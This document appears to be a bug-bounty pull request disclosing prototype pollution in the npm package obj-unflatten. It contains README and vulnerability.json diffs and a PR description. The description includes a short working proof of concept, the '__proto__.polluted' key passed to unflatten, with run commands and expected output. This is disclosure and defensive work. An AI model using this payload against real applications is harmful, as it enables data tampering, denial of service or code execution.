### PR TITLE
Prototype Pollution in obj-unflatten

### DIFF
--- a/bounties/npm/obj-unflatten/1/README.md
+++ b/bounties/npm/obj-unflatten/1/README.md
@@ -1,8 +1,8 @@
-## :writing_hand: Description
+# Description
 
 `obj-unflatten` convert flatten objects in nested ones. This package is vulnerable to `Prototype Pollution`.
 
-## :male_detective: Proof of Concept
+# Proof of Concept
 
 1. Create the following PoC file:
 ```javascript
@@ -23,6 +23,6 @@ Before: undefined
 After: Prototype Polluted!
 ```
 
-## :boom: Impact
+# Impact
 
 `Prototype Pollution` leads to Information Disclosure/DoS/RCE.

--- a/bounties/npm/obj-unflatten/1/README.md
+++ b/bounties/npm/obj-unflatten/1/README.md
@@ -1,0 +1,28 @@
+## :writing_hand: Description
+
+`obj-unflatten` convert flatten objects in nested ones. This package is vulnerable to `Prototype Pollution`.
+
+## :male_detective: Proof of Concept
+
+1. Create the following PoC file:
+```javascript
+// poc.js
+const unflatten = require('obj-unflatten')
+console.log('Before: ' + {}.polluted)
+unflatten({'__proto__.polluted': 'Prototype Polluted!'})
+console.log('After: ' + {}.polluted)
+```
+2. Execute the following commands in the terminal:
+```bash
+npm i obj-unflatten # install vulnerable package
+node poc.js # run the PoC
+```
+3. Check the output:
+```
+Before: undefined
+After: Prototype Polluted!
+```
+
+## :boom: Impact
+
+`Prototype Pollution` leads to Information Disclosure/DoS/RCE.

--- a/bounties/npm/obj-unflatten/1/vulnerability.json
+++ b/bounties/npm/obj-unflatten/1/vulnerability.json
@@ -1,0 +1,61 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2020-12-15",
+    "AffectedVersionRange": "<=1.0.9",
+    "Summary": "Prototype Pollution",
+    "Contributor": {
+        "Discloser": "arjunshibu",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "obj-unflatten",
+        "URL": "https://www.npmjs.com/package/obj-unflatten",
+        "Downloads": "100"
+    },
+    "CWEs": [
+        {
+            "ID": "471",
+            "Description": "Modification of Assumed-Immutable Data (MAID)"
+        }
+    ],
+    "CVSS":
+    {
+        "Version": "3.1",
+        "AV": "N",
+        "AC": "L",
+        "PR": "N",
+        "UI": "N",
+        "S": "U",
+        "C": "L",
+        "I": "L",
+        "A": "L",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "5.6"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/IonicaBizau/obj-unflatten",
+        "Codebase": [
+            "JavaScript"
+        ],
+        "Owner": "IonicaBizau",
+        "Name": "obj-unflatten",
+        "Forks": 1,
+        "Stars": 0
+    },
+    "Permalinks": [
+        ""
+    ],
+    "References": [
+        {
+            "Description": "",
+            "URL": ""
+        }
+    ]
+}
+


### PR DESCRIPTION
## :writing_hand: Description

`obj-unflatten` convert flatten objects in nested ones. This package is vulnerable to `Prototype Pollution`.

## :male_detective: Proof of Concept

1. Create the following PoC file:
```javascript
// poc.js
const unflatten = require('obj-unflatten')
console.log('Before: ' + {}.polluted)
unflatten({'__proto__.polluted': 'Prototype Polluted!'})
console.log('After: ' + {}.polluted)
```
2. Execute the following commands in the terminal:
```bash
npm i obj-unflatten # install vulnerable package
node poc.js # run the PoC
```
3. Check the output:
```
Before: undefined
After: Prototype Polluted!
```

## :boom: Impact

`Prototype Pollution` leads to Information Disclosure/DoS/RCE.

## :white_check_mark: Checklist

* [x]  _Created and populated the `README.md` and `vulnerability.json` files_

* [x]  _Provided the repository URL and any applicable permalinks_

* [x]  _Defined all the applicable weaknesses (CWEs)_

* [x]  _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_

* [x]  _Checked that the vulnerability affects the latest version of the package released_

* [x]  _Checked that a fix does not currently exist that remediates this vulnerability_

* [x]  _Complied with all applicable laws_
